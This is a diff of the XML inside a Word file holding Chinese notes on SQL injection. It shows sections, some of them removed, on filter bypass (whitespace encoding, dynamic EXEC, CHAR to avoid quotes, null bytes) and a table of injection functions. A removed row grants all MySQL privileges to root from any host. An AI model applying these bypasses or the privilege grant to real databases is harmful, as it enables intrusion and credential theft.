+                        <w:t>拼接</w:t>
+                      </w:r>
+                      <w:r>
+                        <w:t>）</w:t>
+                      </w:r>
+                    </w:p>
+                  </w:txbxContent>
+                </v:textbox>
+                <w10:anchorlock/>
+              </v:shape>
+            </w:pict>
+          </mc:Fallback>
+        </mc:AlternateContent>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="2"/>
+      </w:pPr>
+      <w:r>
         <w:t>A</w:t>
       </w:r>
       <w:r>
@@ -22381,7 +23596,7 @@
       <w:pPr>
         <w:ind w:leftChars="600" w:left="1260"/>
       </w:pPr>
-      <w:hyperlink r:id="rId49" w:history="1">
+      <w:hyperlink r:id="rId51" w:history="1">
         <w:r>
           <w:rPr>
             <w:rStyle w:val="a4"/>
@@ -22405,7 +23620,6 @@
         <w:pStyle w:val="3"/>
       </w:pPr>
       <w:r>
-        <w:lastRenderedPageBreak/>
         <w:t>iis</w:t>
       </w:r>
       <w:r>
@@ -22508,7 +23722,7 @@
       <w:pPr>
         <w:ind w:leftChars="600" w:left="1260"/>
       </w:pPr>
-      <w:hyperlink r:id="rId50" w:history="1">
+      <w:hyperlink r:id="rId52" w:history="1">
         <w:r>
           <w:rPr>
             <w:rStyle w:val="a4"/>
@@ -22720,7 +23934,7 @@
           <w:noProof/>
         </w:rPr>
         <w:drawing>
-          <wp:inline distT="0" distB="0" distL="0" distR="0">
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="091B20AD" wp14:editId="70C14F3B">
             <wp:extent cx="5274310" cy="1325846"/>
             <wp:effectExtent l="0" t="0" r="2540" b="8255"/>
             <wp:docPr id="3" name="图片 3"/>
@@ -22737,7 +23951,7 @@
                     </pic:cNvPicPr>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId51">
+                    <a:blip r:embed="rId53">
                       <a:extLst>
                         <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                           <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
@@ -23102,10 +24316,7 @@
         <w:t>层</w:t>
       </w:r>
       <w:r>
-        <w:t>Bypass</w:t>
-      </w:r>
-      <w:r>
-        <w:t>(</w:t>
+        <w:t>Bypass(</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -23147,69 +24358,13 @@
             <o:lock v:ext="edit" aspectratio="t"/>
           </v:shapetype>
           <v:shape id="_x0000_i1025" type="#_x0000_t75" style="width:64.5pt;height:45pt" o:ole="">
-            <v:imagedata r:id="rId52" o:title=""/>
+            <v:imagedata r:id="rId54" o:title=""/>
           </v:shape>
-          <o:OLEObject Type="Embed" ProgID="Acrobat.Document.11" ShapeID="_x0000_i1025" DrawAspect="Icon" ObjectID="_1558610472" r:id="rId53"/>
+          <o:OLEObject Type="Embed" ProgID="Acrobat.Document.11" ShapeID="_x0000_i1025" DrawAspect="Icon" ObjectID="_1559484380" r:id="rId55"/>
         </w:object>
       </w:r>
       <w:r>
         <w:t>)</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="3"/>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
-        <w:t>空白符</w:t>
-      </w:r>
-      <w:r>
-        <w:t>编码绕过</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:rPr>
-          <w:noProof/>
-        </w:rPr>
-        <w:drawing>
-          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="79D98C13" wp14:editId="2932A35F">
-            <wp:extent cx="5274310" cy="2235835"/>
-            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
-            <wp:docPr id="4" name="图片 4"/>
-            <wp:cNvGraphicFramePr>
-              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
-            </wp:cNvGraphicFramePr>
-            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
-              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
-                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
-                  <pic:nvPicPr>
-                    <pic:cNvPr id="1" name=""/>
-                    <pic:cNvPicPr/>
-                  </pic:nvPicPr>
-                  <pic:blipFill>
-                    <a:blip r:embed="rId54"/>
-                    <a:stretch>
-                      <a:fillRect/>
-                    </a:stretch>
-                  </pic:blipFill>
-                  <pic:spPr>
-                    <a:xfrm>
-                      <a:off x="0" y="0"/>
-                      <a:ext cx="5274310" cy="2235835"/>
-                    </a:xfrm>
-                    <a:prstGeom prst="rect">
-                      <a:avLst/>
-                    </a:prstGeom>
-                  </pic:spPr>
-                </pic:pic>
-              </a:graphicData>
-            </a:graphic>
-          </wp:inline>
-        </w:drawing>
       </w:r>
     </w:p>
     <w:p>
@@ -23701,7 +24856,6 @@
         <w:rPr>
           <w:rFonts w:hint="eastAsia"/>
         </w:rPr>
-        <w:lastRenderedPageBreak/>
         <w:t>双引号：</w:t>
       </w:r>
       <w:r>
@@ -23928,6 +25082,7 @@
         <w:rPr>
           <w:rFonts w:hint="eastAsia"/>
         </w:rPr>
+        <w:lastRenderedPageBreak/>
         <w:t>*</w:t>
       </w:r>
       <w:r>
@@ -24348,215 +25503,6 @@
         <w:rPr>
           <w:rFonts w:hint="eastAsia"/>
         </w:rPr>
-        <w:t>使用动态的查询执行</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
-        <w:tab/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
-        <w:tab/>
-        <w:t>1.</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
-        <w:t>动态执行</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
-        <w:tab/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
-        <w:tab/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
-        <w:tab/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
-        <w:t>在</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
-        <w:t>SQLServer</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
-        <w:t>中，可以使用</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
-        <w:t>EXEC</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
-        <w:t>函数以字符串方式执行查询。如</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
-        <w:t>:</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:tab/>
-      </w:r>
-      <w:r>
-        <w:tab/>
-      </w:r>
-      <w:r>
-        <w:tab/>
-      </w:r>
-      <w:r>
-        <w:tab/>
-        <w:t>EXEC(‘SELECT password FROM users’)</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
-        <w:tab/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
-        <w:tab/>
-        <w:t>2.CHAR</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
-        <w:t>函数</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
-        <w:lastRenderedPageBreak/>
-        <w:tab/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
-        <w:tab/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
-        <w:tab/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
-        <w:t>该办法可以绕过对引号的过滤</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:jc w:val="center"/>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:noProof/>
-        </w:rPr>
-        <w:drawing>
-          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7820FF6B" wp14:editId="24F39A9E">
-            <wp:extent cx="4737100" cy="1511300"/>
-            <wp:effectExtent l="0" t="0" r="12700" b="12700"/>
-            <wp:docPr id="2" name="图片 2"/>
-            <wp:cNvGraphicFramePr>
-              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
-            </wp:cNvGraphicFramePr>
-            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
-              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
-                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
-                  <pic:nvPicPr>
-                    <pic:cNvPr id="0" name="Picture 1"/>
-                    <pic:cNvPicPr>
-                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
-                    </pic:cNvPicPr>
-                  </pic:nvPicPr>
-                  <pic:blipFill>
-                    <a:blip r:embed="rId55">
-                      <a:extLst>
-                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
-                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
-                        </a:ext>
-                      </a:extLst>
-                    </a:blip>
-                    <a:srcRect/>
-                    <a:stretch>
-                      <a:fillRect/>
-                    </a:stretch>
-                  </pic:blipFill>
-                  <pic:spPr bwMode="auto">
-                    <a:xfrm>
-                      <a:off x="0" y="0"/>
-                      <a:ext cx="4737100" cy="1511300"/>
-                    </a:xfrm>
-                    <a:prstGeom prst="rect">
-                      <a:avLst/>
-                    </a:prstGeom>
-                    <a:noFill/>
-                    <a:ln>
-                      <a:noFill/>
-                    </a:ln>
-                  </pic:spPr>
-                </pic:pic>
-              </a:graphicData>
-            </a:graphic>
-          </wp:inline>
-        </w:drawing>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="2"/>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
         <w:t>使用空字节</w:t>
       </w:r>
     </w:p>
@@ -24804,6 +25750,7 @@
         <w:ind w:left="840" w:firstLineChars="0" w:firstLine="0"/>
       </w:pPr>
       <w:r>
+        <w:lastRenderedPageBreak/>
         <w:t>Concat()</w:t>
       </w:r>
       <w:r>
@@ -25141,7 +26088,6 @@
         <w:rPr>
           <w:noProof/>
         </w:rPr>
-        <w:lastRenderedPageBreak/>
         <w:drawing>
           <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="659E0D04" wp14:editId="618B1F03">
             <wp:extent cx="4981575" cy="1666875"/>
@@ -25198,16 +26144,30 @@
         <w:t>注入时常用的函数命令</w:t>
       </w:r>
     </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="3"/>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>通用函数</w:t>
+      </w:r>
+    </w:p>
     <w:tbl>
       <w:tblPr>
         <w:tblStyle w:val="4"/>
-        <w:tblW w:w="0" w:type="auto"/>
+        <w:tblW w:w="5000" w:type="pct"/>
         <w:jc w:val="center"/>
         <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
       </w:tblPr>
       <w:tblGrid>
-        <w:gridCol w:w="3728"/>
-        <w:gridCol w:w="3728"/>
+        <w:gridCol w:w="4148"/>
+        <w:gridCol w:w="4148"/>
       </w:tblGrid>
       <w:tr>
         <w:trPr>
@@ -25217,7 +26177,7 @@
         <w:tc>
           <w:tcPr>
             <w:cnfStyle w:val="001000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
-            <w:tcW w:w="3728" w:type="dxa"/>
+            <w:tcW w:w="2500" w:type="pct"/>
           </w:tcPr>
           <w:p>
             <w:r>
@@ -25233,7 +26193,7 @@
         </w:tc>
         <w:tc>
           <w:tcPr>
-            <w:tcW w:w="3728" w:type="dxa"/>
+            <w:tcW w:w="2500" w:type="pct"/>
           </w:tcPr>
           <w:p>
             <w:pPr>
@@ -25256,7 +26216,7 @@
         <w:tc>
           <w:tcPr>
             <w:cnfStyle w:val="001000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
-            <w:tcW w:w="3728" w:type="dxa"/>
+            <w:tcW w:w="2500" w:type="pct"/>
           </w:tcPr>
           <w:p>
             <w:pPr>
@@ -25281,7 +26241,7 @@
         </w:tc>
         <w:tc>
           <w:tcPr>
-            <w:tcW w:w="3728" w:type="dxa"/>
+            <w:tcW w:w="2500" w:type="pct"/>
           </w:tcPr>
           <w:p>
             <w:pPr>
@@ -25303,7 +26263,7 @@
         <w:tc>
           <w:tcPr>
             <w:cnfStyle w:val="001000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
-            <w:tcW w:w="3728" w:type="dxa"/>
+            <w:tcW w:w="2500" w:type="pct"/>
           </w:tcPr>
           <w:p>
             <w:pPr>
@@ -25322,7 +26282,7 @@
         </w:tc>
         <w:tc>
           <w:tcPr>
-            <w:tcW w:w="3728" w:type="dxa"/>
+            <w:tcW w:w="2500" w:type="pct"/>
           </w:tcPr>
           <w:p>
             <w:pPr>
@@ -25345,7 +26305,7 @@
         <w:tc>
           <w:tcPr>
             <w:cnfStyle w:val="001000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
-            <w:tcW w:w="3728" w:type="dxa"/>
+            <w:tcW w:w="2500" w:type="pct"/>
           </w:tcPr>
           <w:p>
             <w:pPr>
@@ -25370,7 +26330,7 @@
         </w:tc>
         <w:tc>
           <w:tcPr>
-            <w:tcW w:w="3728" w:type="dxa"/>
+            <w:tcW w:w="2500" w:type="pct"/>
           </w:tcPr>
           <w:p>
             <w:pPr>
@@ -25392,7 +26352,7 @@
         <w:tc>
           <w:tcPr>
             <w:cnfStyle w:val="001000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
-            <w:tcW w:w="3728" w:type="dxa"/>
+            <w:tcW w:w="2500" w:type="pct"/>
           </w:tcPr>
           <w:p>
             <w:pPr>
@@ -25417,7 +26377,7 @@
         </w:tc>
         <w:tc>
           <w:tcPr>
-            <w:tcW w:w="3728" w:type="dxa"/>
+            <w:tcW w:w="2500" w:type="pct"/>
           </w:tcPr>
           <w:p>
             <w:pPr>
@@ -25440,7 +26400,7 @@
         <w:tc>
           <w:tcPr>
             <w:cnfStyle w:val="001000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
-            <w:tcW w:w="3728" w:type="dxa"/>
+            <w:tcW w:w="2500" w:type="pct"/>
           </w:tcPr>
           <w:p>
             <w:pPr>
@@ -25459,7 +26419,7 @@
         </w:tc>
         <w:tc>
           <w:tcPr>
-            <w:tcW w:w="3728" w:type="dxa"/>
+            <w:tcW w:w="2500" w:type="pct"/>
           </w:tcPr>
           <w:p>
             <w:pPr>
@@ -25481,7 +26441,7 @@
         <w:tc>
           <w:tcPr>
             <w:cnfStyle w:val="001000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
-            <w:tcW w:w="3728" w:type="dxa"/>
+            <w:tcW w:w="2500" w:type="pct"/>
           </w:tcPr>
           <w:p>
             <w:pPr>
@@ -25500,7 +26460,7 @@
         </w:tc>
         <w:tc>
           <w:tcPr>
-            <w:tcW w:w="3728" w:type="dxa"/>
+            <w:tcW w:w="2500" w:type="pct"/>
           </w:tcPr>
           <w:p>
             <w:pPr>
@@ -25529,7 +26489,7 @@
         <w:tc>
           <w:tcPr>
             <w:cnfStyle w:val="001000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
-            <w:tcW w:w="3728" w:type="dxa"/>
+            <w:tcW w:w="2500" w:type="pct"/>
           </w:tcPr>
           <w:p>
             <w:pPr>
@@ -25548,7 +26508,7 @@
         </w:tc>
         <w:tc>
           <w:tcPr>
-            <w:tcW w:w="3728" w:type="dxa"/>
+            <w:tcW w:w="2500" w:type="pct"/>
           </w:tcPr>
           <w:p>
             <w:pPr>
@@ -25576,7 +26536,7 @@
         <w:tc>
           <w:tcPr>
             <w:cnfStyle w:val="001000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
-            <w:tcW w:w="3728" w:type="dxa"/>
+            <w:tcW w:w="2500" w:type="pct"/>
           </w:tcPr>
           <w:p>
             <w:pPr>
@@ -25595,7 +26555,7 @@
         </w:tc>
         <w:tc>
           <w:tcPr>
-            <w:tcW w:w="3728" w:type="dxa"/>
+            <w:tcW w:w="2500" w:type="pct"/>
           </w:tcPr>
           <w:p>
             <w:pPr>
@@ -25618,7 +26578,7 @@
         <w:tc>
           <w:tcPr>
             <w:cnfStyle w:val="001000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
-            <w:tcW w:w="3728" w:type="dxa"/>
+            <w:tcW w:w="2500" w:type="pct"/>
           </w:tcPr>
           <w:p>
             <w:pPr>
@@ -25637,7 +26597,7 @@
         </w:tc>
         <w:tc>
           <w:tcPr>
-            <w:tcW w:w="3728" w:type="dxa"/>
+            <w:tcW w:w="2500" w:type="pct"/>
           </w:tcPr>
           <w:p>
             <w:pPr>
@@ -25665,7 +26625,7 @@
         <w:tc>
           <w:tcPr>
             <w:cnfStyle w:val="001000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
-            <w:tcW w:w="3728" w:type="dxa"/>
+            <w:tcW w:w="2500" w:type="pct"/>
           </w:tcPr>
           <w:p>
             <w:pPr>
@@ -25684,7 +26644,7 @@
         </w:tc>
         <w:tc>
           <w:tcPr>
-            <w:tcW w:w="3728" w:type="dxa"/>
+            <w:tcW w:w="2500" w:type="pct"/>
           </w:tcPr>
           <w:p>
             <w:pPr>
@@ -25713,29 +26673,361 @@
         <w:tc>
           <w:tcPr>
             <w:cnfStyle w:val="001000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
-            <w:tcW w:w="3728" w:type="dxa"/>
+            <w:tcW w:w="2500" w:type="pct"/>
           </w:tcPr>
           <w:p>
             <w:pPr>
               <w:rPr>
-                <w:b w:val="0"/>
-              </w:rPr>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:b w:val="0"/>
-              </w:rPr>
-              <w:t>GRANT ALL PRIVILEGES ON *.* TO 'root'@'%' IDENTIFIED BY '123456' WITH GRANT OPTION;</w:t>
+                <w:rFonts w:hint="eastAsia"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+              </w:rPr>
+              <w:t>mid</w:t>
+            </w:r>
+            <w:r>
+              <w:t>(</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+              </w:rPr>
+              <w:t>string</w:t>
+            </w:r>
+            <w:r>
+              <w:t>,start[,length])</w:t>
             </w:r>
           </w:p>
         </w:tc>
         <w:tc>
           <w:tcPr>
-            <w:tcW w:w="3728" w:type="dxa"/>
+            <w:tcW w:w="2500" w:type="pct"/>
           </w:tcPr>
           <w:p>
             <w:pPr>
               <w:cnfStyle w:val="000000100000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="1" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+              </w:rPr>
+              <w:t>从字符串</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+              </w:rPr>
+              <w:t>string</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+              </w:rPr>
+              <w:t>的第</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+              </w:rPr>
+              <w:t>start</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+              </w:rPr>
+              <w:t>位起，顺序取其</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+              </w:rPr>
+              <w:t>length</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+              </w:rPr>
+              <w:t>位。</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+              </w:rPr>
+              <w:t>start</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+              </w:rPr>
+              <w:t>从</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+              </w:rPr>
+              <w:t>1</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+              </w:rPr>
+              <w:t>开始计数</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+      </w:tr>
+      <w:tr>
+        <w:trPr>
+          <w:jc w:val="center"/>
+        </w:trPr>
+        <w:tc>
+          <w:tcPr>
+            <w:cnfStyle w:val="001000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
+            <w:tcW w:w="2500" w:type="pct"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:t>left(‘string’,num)</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="2500" w:type="pct"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:cnfStyle w:val="000000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+              </w:rPr>
+              <w:t>取</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+              </w:rPr>
+              <w:t>字符串</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+              </w:rPr>
+              <w:t>string</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+              </w:rPr>
+              <w:t>左边</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+              </w:rPr>
+              <w:t>num</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+              </w:rPr>
+              <w:t>位，不区分大小写</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+      </w:tr>
+      <w:tr>
+        <w:trPr>
+          <w:cnfStyle w:val="000000100000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="1" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
+          <w:jc w:val="center"/>
+        </w:trPr>
+        <w:tc>
+          <w:tcPr>
+            <w:cnfStyle w:val="001000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
+            <w:tcW w:w="2500" w:type="pct"/>
+          </w:tcPr>
+          <w:p>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+              </w:rPr>
+              <w:t>group_concate(column</w:t>
+            </w:r>
+            <w:r>
+              <w:t>_name)</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="2500" w:type="pct"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:cnfStyle w:val="000000100000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="1" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+              </w:rPr>
+              <w:t>经常和</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+              </w:rPr>
+              <w:t>group by</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+              </w:rPr>
+              <w:t>一起使用，自动根据规则将列值拼接成一个字符串</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+      </w:tr>
+      <w:tr>
+        <w:trPr>
+          <w:jc w:val="center"/>
+        </w:trPr>
+        <w:tc>
+          <w:tcPr>
